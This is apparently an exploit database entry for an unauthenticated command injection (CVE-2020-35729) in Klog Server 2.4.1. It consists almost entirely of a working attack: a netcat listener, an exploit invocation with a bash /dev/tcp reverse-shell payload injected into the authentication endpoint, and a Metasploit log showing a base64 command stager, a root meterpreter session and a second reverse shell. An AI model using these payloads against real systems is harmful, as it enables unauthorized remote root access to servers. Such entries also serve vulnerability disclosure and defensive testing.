Exploit Title: Klog Server 2.4.1 - Command Injection (Unauthenticated)
Date: 22.12.2020
Exploit Author: b3kc4t (Mustafa GUNDOGDU)
Vendor Homepage: https://www.klogserver.com/
Version: 2.4.1
Tested On: Ubuntu 18.04
CVE: 2020-35729
Description: https://github.com/mustgundogdu/Research/tree/main/KLOG_SERVERPython
Step 1: set listener
nc -nlvp 98
Step 2:reverse shell
python klog_exploit.py --exploit --url https://10.10.56.51:443/actions/authenticate.php --payload "test\"$bash -i >& /dev/tcp/10.10.56.52/98 0>&1&\""
MSF Framework
msf6 > use exploit/linux/http/klog_server_authenticate_user_unauth_command_injection
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > set rhost 192.168.37.152
rhost => 192.168.37.152
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > set verbose true
verbose => true
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > show targets
Exploit targets:
Id Name
-- ----
0 Linux (x86)
1 Linux (x64)
2 Linux (cmd)
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > run
[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Response received after 9 seconds.
[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1towKglAWgCABFcieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/XOXCI.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/qZuQO' < '/tmp/XOXCI.b64' ; chmod +x '/tmp/qZuQO' ; '/tmp/qZuQO' & sleep 2 ; rm -f '/tmp/qZuQO' ; rm -f '/tmp/XOXCI.b64'"]
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (980808 bytes) to 192.168.37.152
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.152:33146) at 2021-02-12 11:17:07 -0600
[*] Command Stager progress - 100.00% done (773/773 bytes)
meterpreter > getuid
Server username: root @ klogserver.klogserver.com (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer : klogserver.klogserver.com
OS : CentOS 7.3.1611 (Linux 3.10.0-514.el7.x86_64)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.37.152 - Meterpreter session 1 closed. Reason: User exit
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > set target 2
target => 2
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > run
[+] 0<&45-;exec 45<>/dev/tcp/192.168.37.1/4444;sh <&45 >&45 2>&45
[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Response received after 10 seconds.
[*] Command shell session 2 opened (192.168.37.1:4444 -> 192.168.37.152:33148) at 2021-02-12 11:17:55 -0600
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux klogserver.klogserver.com 3.10.0-514.el7.x86_64 #1 SMP Tue Nov 22 16:42:41 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux